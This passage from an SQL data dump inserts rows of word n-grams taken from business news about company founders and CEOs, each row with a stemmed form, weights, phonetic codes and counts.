landscape that\'s','a landscape that',0,1,1.6,'A4532132',1,'en'),(41158,'a long','a long',0,1,1.2,'A452',1,'en'),(41159,'a long line','a long line',0,1,1.3667,'A45245',1,'en'),(41160,'a long period','a long period',0,1,1.4333,'A452163',1,'en'),(41161,'a major','a major',0,1,1.2333,'A526',1,'en'),(41162,'a major critique','a major critique',0,1,1.5333,'A5262632',1,'en'),(41163,'a major driver','a major driver',0,1,1.4667,'A5263616',1,'en'),(41164,'a member','a member',0,1,1.2667,'A516',1,'en'),(41165,'a member of','a member of',0,1,1.3667,'A5161',1,'en'),(41166,'a pc','a pc',0,1,1.1333,'A120',1,'en'),(41167,'a pc on','a pc on',0,1,1.2333,'A125',1,'en'),(41168,'a plan','a plan',0,1,1.2,'A145',1,'en'),(41169,'a plan to','a plan to',0,1,1.3,'A1453',1,'en'),(41170,'a serial','a serial',0,1,1.2667,'A264',1,'en'),(41171,'a serial business','a serial business',0,1,1.5667,'A2641252',1,'en'),(41172,'a structure','a structure',0,1,1.3667,'A236236',1,'en'),(41173,'a structure that','a structure that',0,1,1.5333,'A2362363',1,'en'),(41174,'a supplier','a supplier',0,1,1.3333,'A2146',1,'en'),(41175,'a supplier of','a supplier of',0,1,1.4333,'A21461',1,'en'),(41176,'a takeover','a takeover',0,1,1.3333,'A3216',1,'en'),(41177,'a takeover attempt','a takeover attempt',0,1,1.6,'A32163513',1,'en'),(41178,'a unified','a unified',0,1,1.3,'A513',1,'en'),(41179,'a unified computer','a unified computer',0,1,1.6,'A51325136',1,'en'),(41180,'a via','a via',0,1,1.1667,'A100',1,'en'),(41181,'a via for','a via for',0,1,1.3,'A160',1,'en'),(41182,'able to figure','abl to figure',0,1,1.4667,'A143126',1,'en'),(41183,'about him','about him',0,1,1.3,'A135',1,'en'),(41184,'about him overstaying','about him overstaying',0,1,1.7,'A135162352',1,'en'),(41185,'abroad','abroad',0,0,0.4,'A163',1,'en'),(41186,'abroad growth','abroad growth',0,1,1.4333,'A163263',1,'en'),(41187,'abroad growth schultz','abroad growth schultz',0,1,1.7,'A1632632432',1,'en'),(41188,'absence','absenc',0,0,0.4667,'A1252',1,'en'),(41189,'absence as','absenc as',0,1,1.3333,'A1252',1,'en'),(41190,'absence as it','absenc as it',0,1,1.4333,'A12523',1,'en'),(41191,'accelerated','acceler',0,0,0.7333,'A2463',1,'en'),(41192,'accelerated a','acceler a',0,1,1.4333,'A2463',1,'en'),(41193,'accelerated a plan','acceler a plan',0,1,1.6,'A2463145',1,'en'),(41194,'aceoas','aceoa',0,0,0.4,'A200',1,'en'),(41195,'aceoas sales','aceoa sales',0,1,1.4,'A242',1,'en'),(41196,'aceoas sales growth','aceoa sales growth',0,1,1.6333,'A24263',1,'en'),(41197,'achieved his','achiev his',0,1,1.4,'A2132',1,'en'),(41198,'achieved his initial','achiev his initial',0,1,1.6667,'A2132534',1,'en'),(41199,'additional in','addit in',0,1,1.4333,'A3545',1,'en'),(41200,'additional in 1997','addit in 1997',0,1,1.6,'A3545',1,'en'),(41201,'additional private','addit private',0,1,1.6,'A3541613',1,'en'),(41202,'additional private last','addit private last',0,1,1.7667,'A3541613423',1,'en'),(41203,'advertising to','advertis to',0,1,1.4667,'A31632523',1,'en'),(41204,'advertising to google','advertis to google',0,1,1.7,'A3163252324',1,'en'),(41205,'adviser','advis',0,0,0.4667,'A3126',1,'en'),(41206,'adviser the','advis the',0,1,1.3667,'A31263',1,'en'),(41207,'adviser the hope','advis the hope',0,1,1.5333,'A312631',1,'en'),(41208,'after 33','after 33',0,1,1.2667,'A136',1,'en'),(41209,'after 33 years','after 33 years',0,1,1.4667,'A1362',1,'en'),(41210,'after 40','after 40',0,1,1.2667,'A136',1,'en'),(41211,'after 40 years','after 40 years',0,1,1.4667,'A1362',1,'en'),(41212,'after a 12','after a 12',0,1,1.3333,'A136',1,'en'),(41213,'after he and','after he and',0,1,1.4,'A13653',1,'en'),(41214,'after he built','after he built',0,1,1.4667,'A136143',1,'en'),(41215,'after he was','after he was',0,1,1.4,'A1362',1,'en'),(41216,'after the company','after the company',0,1,1.5667,'A13632515',1,'en'),(41217,'after the market','after the market',0,1,1.5333,'A13635623',1,'en'),(41218,'agent','agent',0,0,0.3333,'A253',1,'en'),(41219,'agent to','agent to',0,1,1.2667,'A253',1,'en'),(41220,'agent to run','agent to run',0,1,1.4,'A25365',1,'en'),(41221,'alien','alien',0,0,0.3333,'A450',1,'en'),(41222,'alien life','alien life',0,1,1.3333,'A4541',1,'en'),(41223,'alien life aceoas','alien life aceoas',0,1,1.5667,'A45412',1,'en'),(41224,'almost led','almost led',0,1,1.3333,'A452343',1,'en'),(41225,'almost led to','almost led to',0,1,1.4333,'A452343',1,'en'),(41226,'alone','alon',0,0,0.3333,'A450',1,'en'),(41227,'alone richard','alon richard',0,1,1.4333,'A456263',1,'en'),(41228,'alone richard schulze','alon richard schulze',0,1,1.7,'A456263242',1,'en'),(41229,'also been','also been',0,1,1.3,'A4215',1,'en'),(41230,'also been out','also been out',0,1,1.4333,'A42153',1,'en'),(41231,'altered more','alter more',0,1,1.4,'A436356',1,'en'),(41232,'altered more than','alter more than',0,1,1.5667,'A43635635',1,'en'),(41233,'am here','am here',0,1,1.2333,'A560',1,'en'),(41234,'am here to','am here to',0,1,1.3333,'A563',1,'en'),(41235,'an additional in','an additional in',0,1,1.5333,'A53545',1,'en'),(41236,'an additional private','an additional private',0,1,1.7,'A53541613',1,'en'),(41237,'an appliance','an appliance',0,1,1.4,'A51452',1,'en'),(41238,'an appliance company','an appliance company',0,1,1.6667,'A51452515',1,'en'),(41239,'an illustration','an illustration',0,1,1.5,'A5423635',1,'en'),(41240,'an illustration of','an illustration of',0,1,1.6,'A54236351',1,'en'),(41241,'an internet','an internet',0,1,1.3667,'A53653',1,'en'),(41242,'an internet marketing','an internet marketing',0,1,1.7,'A53653562352',1,'en'),(41243,'an iphone there\'s','an iphone there',0,1,1.5667,'A515362',1,'en'),(41244,'and a director','and a director',0,1,1.4667,'A536236',1,'en'),(41245,'and a financial','and a financial',0,1,1.5,'A531524',1,'en'),(41246,'and complaining','and complaining',0,1,1.5,'A53251452',1,'en'),(41247,'and complaining about','and complaining about',0,1,1.7,'A5325145213',1,'en'),(41248,'and conduct','and conduct',0,1,1.3667,'A5325323',1,'en'),(41249,'and conduct business','and conduct business',0,1,1.6667,'A53253231252',1,'en'),(41250,'and easy','and easy',0,1,1.2667,'A532',1,'en'),(41251,'and easy to','and easy to',0,1,1.3667,'A5323',1,'en'),(41252,'and every jobs','and every jobs',0,1,1.4667,'A5316212',1,'en'),(41253,'and failed','and failed',0,1,1.3333,'A53143',1,'en'),(41254,'and failed to','and failed to',0,1,1.4333,'A53143',1,'en'),(41255,'and failing','and failing',0,1,1.3667,'A531452',1,'en'),(41256,'and failing to','and failing to',0,1,1.4667,'A5314523',1,'en'),(41257,'and friends','and friends',0,1,1.3667,'A5316532',1,'en'),(41258,'and friends took','and friends took',0,1,1.5333,'A531653232',1,'en'),(41259,'and he accelerated','and he accelerated',0,1,1.6,'A532463',1,'en'),(41260,'and he\'d','and he',0,1,1.2667,'A530',1,'en'),(41261,'and he\'d quit','and he quit',0,1,1.4333,'A5323',1,'en'),(41262,'and his','and his',0,1,1.2333,'A532',1,'en'),(41263,'and his cell','and his cell',0,1,1.4,'A5324',1,'en'),(41264,'and in every','and in every',0,1,1.4,'A53516',1,'en'),(41265,'and internet business','and internet business',0,1,1.7,'A53536531252',1,'en'),(41266,'and invention','and invention',0,1,1.4333,'A5351535',1,'en'),(41267,'and invention that','and invention that',0,1,1.6,'A53515353',1,'en'),(41268,'and invents','and invents',0,1,1.3667,'A5351532',1,'en'),(41269,'and invents an','and invents an',0,1,1.4667,'A53515325',1,'en'),(41270,'and jobs','and jobs',0,1,1.2667,'A53212',1,'en'),(41271,'and jobs have','and jobs have',0,1,1.4333,'A532121',1,'en'),(41272,'and microsoft\'s','and microsoft',0,1,1.5,'A535262132',1,'en'),(41273,'and microsoft\'s successful','and microsoft successful',0,1,1.8667,'A53526213214',1,'en'),(41274,'and office as','and office as',0,1,1.4333,'A5312',1,'en'),(41275,'and ralph lauren','and ralph lauren',0,1,1.5333,'A53641465',1,'en'),(41276,'and services','and services',0,1,1.4,'A532612',1,'en'),(41277,'and services a','and services a',0,1,1.4667,'A532612',1,'en'),(41278,'and tablets','and tablets',0,1,1.3667,'A531432',1,'en'),(41279,'and tablets most','and tablets most',0,1,1.5333,'A531432523',1,'en'),(41280,'and the legacy\'','and the legacy',0,1,1.5,'A5342',1,'en'),(41281,'and the only','and the only',0,1,1.4,'A5354',1,'en'),(41282,'and they can\'t','and they can',0,1,1.4667,'A53253',1,'en'),(41283,'and watched','and watched',0,1,1.3667,'A5323',1,'en'),(41284,'and watched it','and watched it',0,1,1.4667,'A5323',1,'en'),(41285,'and work','and work',0,1,1.2667,'A5362',1,'en'),(41286,'and work part','and work part',0,1,1.4333,'A5362163',1,'en'),(41287,'and write','and write',0,1,1.3,'A5363',1,'en'),(41288,'and write testimonials','and write testimonials',0,1,1.7333,'A536323542',1,'en'),(41289,'any other company','ani other company',0,1,1.5667,'A5362515',2,'en'),(41290,'apple and','appl and',0,1,1.3,'A1453',1,'en'),(41291,'apple and failed','appl and failed',0,1,1.5333,'A1453143',1,'en'),(41292,'apple and invents','appl and invents',0,1,1.5667,'A145351532',1,'en'),(41293,'apple inc','appl inc',0,1,1.3,'A1452',1,'en'),(41294,'apple inc to','appl inc to',0,1,1.4,'A14523',1,'en'),(41295,'apple until','appl until',0,1,1.3667,'A14534',1,'en'),(41296,'apple until a','appl until a',0,1,1.4333,'A14534',1,'en'),(41297,'appliance','applianc',0,0,0.6,'A1452',1,'en'),(41298,'appliance company','applianc company',0,1,1.5667,'A1452515',1,'en'),(41299,'appliance company when','applianc company when',0,1,1.7333,'A1452515',1,'en'),(41300,'architect','architect',0,0,0.6,'A62323',1,'en'),(41301,'architect relatedbill','architect relatedbill',0,1,1.7,'A6232364314',1,'en'),(41302,'architect relatedbill gates','architect relatedbill gates',0,1,1.9,'A6232364314232',1,'en'),(41303,'as chairman','as chairman',0,1,1.3667,'A265',1,'en'),(41304,'as chairman after','as chairman after',0,1,1.5667,'A265136',1,'en'),(41305,'as chairman the','as chairman the',0,1,1.5,'A2653',1,'en'),(41306,'as indispensable','as indispensable',0,1,1.5333,'A253215214',1,'en'),(41307,'as indispensable to','as indispensable to',0,1,1.6333,'A2532152143',1,'en'),(41308,'as it struggled','as it struggled',0,1,1.5,'A23236243',1,'en'),(41309,'as its','as its',0,1,1.2,'A232',1,'en'),(41310,'as its business','as its business',0,1,1.5,'A2321252',1,'en'),(41311,'as lululemon','as lululemon',0,1,1.4,'A245',1,'en'),(41312,'as lululemon athletica','as lululemon athletica',0,1,1.7333,'A2453432',1,'en'),(41313,'as nadella\'s','as nadella',0,1,1.4,'A25342',1,'en'),(41314,'as nadella\'s machinery','as nadella machinery',0,1,1.7333,'A253425256',1,'en'),(41315,'as next','as next',0,1,1.2333,'A2523',1,'en'),(41316,'as next ceo','as next ceo',0,1,1.3667,'A25232',1,'en'),(41317,'as the ipad','as the ipad',0,1,1.3667,'A2313',1,'en'),(41318,'asceo','asceo',0,0,0.3333,'A200',1,'en'),(41319,'asceo even','asceo even',0,1,1.3333,'A215',1,'en'),(41320,'asceo even dating','asceo even dating',0,1,1.5667,'A215352',1,'en'),(41321,'aside as','asid as',0,1,1.2667,'A232',1,'en'),(41322,'aside as chairman','asid as chairman',0,1,1.5667,'A23265',1,'en'),(41323,'at apple','at apple',0,1,1.2667,'A314',1,'en'),(41324,'at apple inc','at apple inc',0,1,1.4,'A31452',1,'en'),(41325,'at babson','at babson',0,1,1.3,'A3125',1,'en'),(41326,'at babson college','at babson college',0,1,1.5667,'A3125242',1,'en'),(41327,'at dell','at dell',0,1,1.2333,'A340',1,'en'),(41328,'at dell inc','at dell inc',0,1,1.3667,'A3452',1,'en'),(41329,'at his','at his',0,1,1.2,'A320',1,'en'),(41330,'at his namesake','at his namesake',0,1,1.5,'A3252',1,'en'),(41331,'at microsoft','at microsoft',0,1,1.4,'A3526213',1,'en'),(41332,'at microsoft even','at microsoft even',0,1,1.5667,'A352621315',1,'en'),(41333,'at shoe','at shoe',0,1,1.2333,'A320',1,'en'),(41334,'at shoe hold','at shoe hold',0,1,1.4,'A3243',1,'en'),(41335,'at this','at this',0,1,1.2333,'A320',1,'en'),(41336,'at this time','at this time',0,1,1.4,'A3235',1,'en'),(41337,'at yahoo','at yahoo',0,1,1.2667,'A300',1,'en'),(41338,'at yahoo corporation','at yahoo corporation',0,1,1.6667,'A3261635',1,'en'),(41339,'athletica','athletica',0,0,0.6,'A3432',1,'en'),(41340,'athletica inc','athletica inc',0,1,1.4333,'A343252',1,'en'),(41341,'athletica inc chairman','athletica inc chairman',0,1,1.7333,'A34325265',1,'en'),(41342,'attempt last','attempt last',0,1,1.4,'A3513423',1,'en'),(41343,'attempt last year','attempt last year',0,1,1.5667,'A35134236',1,'en'),(41344,'attentive','attent',0,0,0.6,'A3531',1,'en'),(41345,'attentive to','attent to',0,1,1.4,'A35313',1,'en'),(41346,'attentive to the','attent to the',0,1,1.5333,'A35313',1,'en'),(41347,'babson','babson',0,0,0.4,'B250',1,'en'),(41348,'babson college','babson college',0,1,1.4667,'B25242',1,'en'),(41349,'babson college in','babson college in',0,1,1.5667,'B252425',1,'en'),(41350,'back he','back he',0,1,1.2333,'B200',1,'en'),(41351,'back he was','back he was',0,1,1.3667,'B200',1,'en'),(41352,'back the','back the',0,1,1.2667,'B230',1,'en'),(41353,'back the early','back the early',0,1,1.4667,'B2364',1,'en'),(41354,'back to founder','back to founder',0,1,1.5,'B231536',1,'en'),(41355,'back with','back with',0,1,1.3,'B230',1,'en'),(41356,'back with sort','back with sort',0,1,1.4667,'B23263',1,'en'),(41357,'be a billion','be a billion',0,1,1.4,'B450',1,'en'),(41358,'be a director','be a director',0,1,1.4333,'B36236',1,'en'),(41359,'be happy','be happy',0,1,1.2667,'B000',1,'en'),(41360,'be happy in','be happy in',0,1,1.3667,'B500',1,'en'),(41361,'be protesting','be protesting',0,1,1.4333,'B632352',1,'en'),(41362,'be protesting and','be protesting and',0,1,1.5667,'B63235253',1,'en'),(41363,'became the','becam the',0,1,1.3333,'B253',1,'en'),(41364,'became the world\'s','becam the world',0,1,1.6,'B2536432',1,'en'),(41365,'becameceoin','becameceoin',0,0,0.7333,'B2525',1,'en'),(41366,'becameceoin 2007','becameceoin 2007',0,1,1.5333,'B2525',1,'en'),(41367,'becameceoin 2007 after','becameceoin 2007 after',0,1,1.7333,'B2525136',1,'en'),(41368,'been out','been out',0,1,1.2667,'B530',1,'en'),(41369,'been out ralph','been out ralph',0,1,1.4667,'B53641',1,'en'),(41370,'been rivals','been rivals',0,1,1.3667,'B56142',1,'en'),(41371,'been rivals and','been rivals and',0,1,1.5,'B5614253',1,'en'),(41372,'before apple','befor apple',0,1,1.4,'B614',1,'en'),(41373,'before apple and','befor apple and',0,1,1.5333,'B61453',1,'en'),(41374,'before he','befor he',0,1,1.3,'B600',1,'en'),(41375,'before he died','befor he died',0,1,1.4667,'B630',1,'en'),(41376,'being forced','be forced',0,1,1.4,'B521623',1,'en'),(41377,'being forced for','be forced for',0,1,1.5333,'B52162316',1,'en'),(41378,'being spoken','be spoken',0,1,1.4,'B52125',1,'en'),(41379,'being spoken yang','be spoken yang',0,1,1.5667,'B521252',1,'en'),(41380,'best buy','best buy',0,1,1.2667,'B231',1,'en'),(41381,'best buy co.\'s','best buy co.',0,1,1.4667,'B2312',1,'en'),(41382,'bid from','bid from',0,1,1.2667,'B3165',1,'en'),(41383,'bid from microsoft','bid from microsoft',0,1,1.6,'B316526213',1,'en'),(41384,'bill','bill',0,0,0.2667,'B400',1,'en'),(41385,'bill gates','bill gates',0,1,1.3333,'B4232',1,'en'),(41386,'bill gates as','bill gates as',0,1,1.4333,'B4232',1,'en'),(41387,'bill gates is','bill gates is',0,1,1.4333,'B4232',1,'en'),(41388,'bill gates joins','bill gates joins',0,1,1.5333,'B423252',1,'en'),(41389,'billion','billion',0,0,0.4667,'B450',1,'en'),(41390,'billion dollar','billion dollar',0,1,1.4667,'B45346',1,'en'),(41391,'billion dollar brand','billion dollar brand',0,1,1.6667,'B453461653',1,'en'),(41392,'billion takeover','billion takeover',0,1,1.5333,'B453216',1,'en'),(41393,'billion takeover bid','billion takeover bid',0,1,1.6667,'B45321613',1,'en'),(41394,'billy','billi',0,0,0.3333,'B400',1,'en'),(41395,'billy durant','billi durant',0,1,1.4,'B43653',1,'en'),(41396,'billy durant made','billi durant made',0,1,1.5667,'B4365353',1,'en'),(41397,'board','board',0,0,0.3333,'B630',1,'en'),(41398,'board chairmicrosoft','board chairmicrosoft',0,1,1.6667,'B6326526213',1,'en'),(41399,'board chairmicrosoft corp','board chairmicrosoft corp',0,1,1.8333,'B6326526213261',1,'en'),(41400,'boston and','boston and',0,1,1.3333,'B2353',1,'en'),(41401,'boston and a','boston and a',0,1,1.4,'B2353',1,'en'),(41402,'brand just','brand just',0,1,1.3333,'B65323',1,'en'),(41403,'brand just handed','brand just handed',0,1,1.5667,'B6532353',1,'en'),(41404,'breakup','breakup',0,0,0.4667,'B621',1,'en'),(41405,'breakup microsoft','breakup microsoft',0,1,1.5667,'B621526213',1,'en'),(41406,'breakup microsoft continues','breakup microsoft continues',0,1,1.9,'B62152621325352',1,'en'),(41407,'broker an','broker an',0,1,1.3,'B6265',1,'en'),(41408,'broker an internet','broker an internet',0,1,1.6,'B62653653',1,'en'),(41409,'browser war','browser war',0,1,1.3667,'B626',1,'en'),(41410,'browser war of','browser war of',0,1,1.4667,'B6261',1,'en'),(41411,'builder','builder',0,0,0.4667,'B436',1,'en'),(41412,'builder famously','builder famously',0,1,1.5333,'B4361524',1,'en'),(41413,'builder famously attentive','builder famously attentive',0,1,1.8667,'B43615243531',1,'en'),(41414,'built a','built a',0,1,1.2333,'B430',1,'en'),(41415,'built a great','built a great',0,1,1.4333,'B43263',1,'en'),(41416,'built universal','built universal',0,1,1.5,'B4351624',1,'en'),(41417,'built universal motors','built universal motors',0,1,1.7333,'B43516245362',1,'en'),(41418,'business education','busi education',0,1,1.6,'B2523235',1,'en'),(41419,'business education at','busi education at',0,1,1.7,'B25232353',1,'en'),(41420,'business had','busi had',0,1,1.4,'B2523',1,'en'),(41421,'business had less','busi had less',0,1,1.5667,'B252342',1,'en'),(41422,'business manager','busi manager',0,1,1.5333,'B252526',1,'en'),(41423,'business manager he','busi manager he',0,1,1.6333,'B252526',1,'en'),(41424,'business owner','busi owner',0,1,1.4667,'B25256',1,'en'),(41425,'business owner mindset','busi owner mindset',0,1,1.7333,'B252565323',1,'en'),(41426,'business pursuits','busi pursuits',0,1,1.5667,'B25216232',1,'en'),(41427,'business pursuits remaining','busi pursuits remaining',0,1,1.9,'B25216232652',1,'en'),(41428,'business some','busi some',0,1,1.4333,'B2525',1,'en'),(41429,'business some founders','busi some founders',0,1,1.7333,'B252515362',1,'en'),(41430,'buy co.\'s','bui co.',0,1,1.3,'B200',1,'en'),(41431,'buy co.\'s revitalisation','bui co. revitalisation',0,1,1.8,'B26134235',1,'en'),(41432,'buying the','bui the',0,1,1.3333,'B523',1,'en'),(41433,'buying the having','bui the having',0,1,1.5667,'B523152',1,'en'),(41434,'calls next','call next',0,1,1.3333,'C42523',1,'en'),(41435,'calls next epoch','call next epoch',0,1,1.5333,'C4252312',1,'en'),(41436,'can happen','can happen',0,1,1.3333,'C515',1,'en'),(41437,'can happen when','can happen when',0,1,1.5,'C515',1,'en'),(41438,'can\'t make','can make',0,1,1.3333,'C5352',1,'en'),(41439,'can\'t make that','can make that',0,1,1.5,'C53523',1,'en'),(41440,'case of','case of',0,1,1.2333,'C100',1,'en'),(41441,'case of somebody','case of somebody',0,1,1.5333,'C12513',1,'en'),(41442,'cell phone ltd','cell phone ltd',0,1,1.4667,'C41543',1,'en'),(41443,'centers','center',0,0,0.4667,'C5362',1,'en'),(41444,'centers it','center it',0,1,1.3333,'C53623',1,'en'),(41445,'centers it was','center it was',0,1,1.4667,'C536232',1,'en'),(41446,'ceo','ceo',0,0,0.2,'C000',1,'en'),(41447,'ceo john','ceo john',0,1,1.2667,'C500',1,'en'),(41448,'ceo john thompson','ceo john thompson',0,1,1.5667,'C535125',1,'en'),(41449,'ceo satya','ceo satya',0,1,1.3,'C300',1,'en'),(41450,'ceo satya nadella','ceo satya nadella',0,1,1.5667,'C3534',1,'en'),(41451,'chain introduced','chain introduced',0,1,1.5333,'C536323',1,'en'),(41452,'chain introduced the','chain introduced the',0,1,1.6667,'C536323',1,'en'),(41453,'chairman','chairman',0,0,0.5333,'C650',1,'en'),(41454,'chairman after','chairman after',0,1,1.4667,'C65136',1,'en'),(41455,'chairman after 33','chairman after 33',0,1,1.5667,'C65136',1,'en'),(41456,'chairman impeded','chairman impeded',0,1,1.5333,'C6513',1,'en'),(41457,'chairman impeded alien','chairman impeded alien',0,1,1.7333,'C651345',1,'en'),(41458,'chairman the','chairman the',0,1,1.4,'C653',1,'en'),(41459,'chairman the 58','chairman the 58',0,1,1.5,'C653',1,'en'),(41460,'chairmicrosoft','chairmicrosoft',0,0,0.9333,'C6526213',1,'en'),(41461,'chairmicrosoft corp','chairmicrosoft corp',0,1,1.6333,'C6526213261',1,'en'),(41462,'chairmicrosoft corp names','chairmicrosoft corp names',0,1,1.8333,'C652621326152',1,'en'),(41463,'change bill','chang bill',0,1,1.3667,'C5214',1,'en'),(41464,'change bill gates','chang bill gates',0,1,1.5667,'C5214232',1,'en'),(41465,'change ibm','chang ibm',0,1,1.3333,'C5215',1,'en'),(41466,'change ibm used','chang ibm used',0,1,1.5,'C521523',1,'en'),(41467,'change jerry','chang jerry',0,1,1.4,'C526',1,'en'),(41468,'change jerry yang\'s','chang jerry yang',0,1,1.6333,'C52652',1,'en'),(41469,'changing the landscape','chang the landscape',0,1,1.7333,'C5252345321',1,'en'),(41470,'chief financial','chief financial',0,1,1.5,'C1524',1,'en'),(41471,'chief financial officer','chief financial officer',0,1,1.7667,'C1524126',1,'en'),(41472,'chief software','chief software',0,1,1.4667,'C12136',1,'en'),(41473,'chief software architect','chief software architect',0,1,1.8,'C121362323',1,'en'),(41474,'chip','chip',0,0,0.2667,'C100',1,'en'),(41475,'chip wilson\'s','chip wilson',0,1,1.4333,'C14252',1,'en'),(41476,'chip wilson\'s kept','chip wilson kept',0,1,1.6,'C1425213',1,'en'),(41477,'choice for','choic for',0,1,1.3333,'C160',1,'en'),(41478,'choice for most','choic for most',0,1,1.5,'C16523',1,'en'),(41479,'co founder','co founder',0,1,1.3333,'C1536',1,'en'),(41480,'co founder explored','co founder explored',0,1,1.6333,'C153621463',1,'en'),(41481,'co founder has','co founder has',0,1,1.4667,'C15362',1,'en'),(41482,'co founder of','co founder of',0,1,1.4333,'C15361',1,'en'),(41483,'co that','co that',0,1,1.2333,'C300',1,'en'),(41484,'co that they','co that they',0,1,1.4,'C300',1,'en'),(41485,'co.\'s','co.',0,0,0.3333,'C000',1,'en'),(41486,'co.\'s revitalisation','co. revitalisation',0,1,1.6667,'C6134235',1,'en'),(41487,'co.\'s revitalisation efforts','co. revitalisation efforts',0,1,1.9333,'C61342351632',1,'en'),(41488,'coffee now','coffe now',0,1,1.3333,'C150',1,'en'),(41489,'coffee now a','coffe now a',0,1,1.4,'C150',1,'en'),(41490,'coffee shop','coffe shop',0,1,1.3667,'C121',1,'en'),(41491,'coffee shop chain','coffe shop chain',0,1,1.5667,'C12125',1,'en'),(41492,'college in','colleg in',0,1,1.3333,'C425',1,'en'),(41493,'college in wellesley','colleg in wellesley',0,1,1.6667,'C425424',1,'en'),(41494,'comes back','come back',0,1,1.3333,'C5212',1,'en'),(41495,'comes back with','come back with',0,1,1.5,'C52123',1,'en'),(41496,'comes if','come if',0,1,1.2667,'C521',1,'en'),(41497,'comes if the','come if the',0,1,1.4,'C5213',1,'en'),(41498,'comes near','come near',0,1,1.3333,'C5256',1,'en'),(41499,'comes near gates','come near gates',0,1,1.5333,'C5256232',1,'en'),(41500,'comes up','come up',0,1,1.2667,'C521',1,'en'),(41501,'comes up with','come up with',0,1,1.4333,'C5213',1,'en'),(41502,'coming back to','come back to',0,1,1.4667,'C52123',1,'en'),(41503,'communicate','commun',0,0,0.7333,'C523',1,'en'),(41504,'communicate take','commun take',0,1,1.5333,'C5232',1,'en'),(41505,'communicate take notice','commun take notice',0,1,1.7667,'C5232532',1,'en'),(41506,'companies and the','compani and the',0,1,1.5667,'C515253',1,'en'),(41507,'companies into','compani into',0,1,1.4667,'C515253',1,'en'),(41508,'companies into trying','compani into trying',0,1,1.7,'C515253652',1,'en'),(41509,'company after','compani after',0,1,1.4333,'C515136',1,'en'),(41510,'company after 40','compani after 40',0,1,1.5333,'C515136',1,'en'),(41511,'company gateways','compani gateways',0,1,1.5333,'C515232',1,'en'),(41512,'company gateways and','compani gateways and',0,1,1.6667,'C51523253',1,'en'),(41513,'company having','compani having',0,1,1.4667,'C515152',1,'en'),(41514,'company having moved','compani having moved',0,1,1.6667,'C515152513',1,'en'),(41515,'company lost','compani lost',0,1,1.4,'C515423',1,'en'),(41516,'company lost its','compani lost its',0,1,1.5333,'C5154232',1,'en'),(41517,'company when','compani when',0,1,1.4,'C515',1,'en'),(41518,'company when entrance','compani when entrance',0,1,1.7,'C5153652',1,'en'),(41519,'complaining','complain',0,0,0.7333,'C51452',1,'en'),(41520,'complaining about','complain about',0,1,1.5667,'C5145213',1,'en'),(41521,'complaining about him','complain about him',0,1,1.7,'C51452135',1,'en'),(41522,'computer itself','comput itself',0,1,1.5,'C51363241',1,'en'),(41523,'computer itself for','comput itself for',0,1,1.6333,'C513632416',1,'en'),(41524,'computing','comput',0,0,0.6,'C51352',1,'en'),(41525,'computing devices','comput devices',0,1,1.5667,'C51352312',1,'en'),(41526,'computing devices which','comput devices which',0,1,1.7667,'C51352312',1,'en'),(41527,'concern','concern',0,0,0.4667,'C5265',2,'en'),(41528,'concern he','concern he',0,1,1.3333,'C5265',1,'en'),(41529,'concern he oversaw','concern he oversaw',0,1,1.6,'C5265162',1,'en'),(41530,'conduct','conduct',0,0,0.4667,'C5323',1,'en'),(41531,'conduct business','conduct business',0,1,1.5333,'C53231252',1,'en'),(41532,'conduct business some','conduct business some',0,1,1.7,'C532312525',1,'en'),(41533,'confronts','confront',0,0,0.6,'C516532',1,'en'),(41534,'confronts a','confront a',0,1,1.3667,'C516532',1,'en'),(41535,'confronts a landscape','confront a landscape',0,1,1.7,'C51653245321',1,'en'),(41536,'consumer','consum',0,0,0.5333,'C5256',2,'en'),(41537,'consumer computing','consum computing',0,1,1.6,'C5256251352',1,'en'),(41538,'consumer computing devices','consum computing devices',0,1,1.8667,'C5256251352312',1,'en'),(41539,'continue','continu',0,0,0.5333,'C535',1,'en'),(41540,'continue the','continu the',0,1,1.4,'C5353',1,'en'),(41541,'continue the tradition','continu the tradition',0,1,1.7333,'C5353635',1,'en'),(41542,'continues','continu',0,0,0.6,'C5352',1,'en'),(41543,'continues money','continu money',0,1,1.5,'C53525',1,'en'),(41544,'continues money software','continu money software',0,1,1.8,'C535252136',1,'en'),(41545,'continues to','continu to',0,1,1.4,'C53523',1,'en'),(41546,'continues to set','continu to set',0,1,1.5333,'C5352323',1,'en'),(41547,'corp ceo','corp ceo',0,1,1.2667,'C612',1,'en'),(41548,'corp ceo satya','corp ceo satya',0,1,1.4667,'C6123',1,'en'),(41549,'corp names','corp names',0,1,1.3333,'C6152',1,'en'),(41550,'corp names insider','corp names insider',0,1,1.6,'C61525236',1,'en'),(41551,'corporate','corpor',0,0,0.6,'C6163',2,'en'),(41552,'corporate creation','corpor creation',0,1,1.6,'C61632635',1,'en'),(41553,'corporate creation alone','corpor creation alone',0,1,1.8,'C6163263545',1,'en'),(41554,'corporation is','corpor is',0,1,1.4667,'C616352',1,'en'),(41555,'corporation is an','corpor is an',0,1,1.5667,'C6163525',1,'en'),(41556,'couple','coupl',0,0,0.4,'C140',1,'en'),(41557,'couple of','coupl of',0,1,1.3,'C141',1,'en'),(41558,'couple of locosounds','coupl of locosounds',0,1,1.6667,'C14142532',1,'en'),(41559,'created gates','creat gates',0,1,1.4333,'C63232',1,'en'),(41560,'created gates will','creat gates will',0,1,1.6,'C632324',1,'en'),(41561,'creation','creation',0,0,0.5333,'C635',1,'en'),(41562,'creation alone','creation alone',0,1,1.4667,'C63545',1,'en'),(41563,'creation alone richard','creation alone richard',0,1,1.7333,'C635456263',1,'en'),(41564,'creation of','creation of',0,1,1.3667,'C6351',1,'en'),(41565,'creation of the','creation of the',0,1,1.5,'C63513',1,'en'),(41566,'critique','critiqu',0,0,0.5333,'C632',1,'en'),(41567,'critique of','critiqu of',0,1,1.3667,'C6321',1,'en'),(41568,'critique of gates','critiqu of gates',0,1,1.5667,'C6321232',1,'en'),(41569,'data centers','data centers',0,1,1.4,'D25362',1,'en'),(41570,'data centers it','data centers it',0,1,1.5,'D253623',1,'en'),(41571,'dating','date',0,0,0.4,'D520',1,'en'),(41572,'dating back','date back',0,1,1.3667,'D5212',1,'en'),(41573,'dating back the','date back the',0,1,1.5,'D52123',1,'en'),(41574,'david filo','david filo',0,1,1.3333,'D1314',1,'en'),(41575,'david filo in','david filo in',0,1,1.4333,'D13145',1,'en'),(41576,'davis','davi',0,0,0.3333,'D120',1,'en'),(41577,'davis being','davi being',0,1,1.3667,'D12152',1,'en'),(41578,'davis being spoken','davi being spoken',0,1,1.6,'D12152125',1,'en'),(41579,'davis referred','davi referred',0,1,1.4667,'D126163',1,'en'),(41580,'davis referred to','davi referred to',0,1,1.5667,'D126163',1,'en'),(41581,'day game','dai 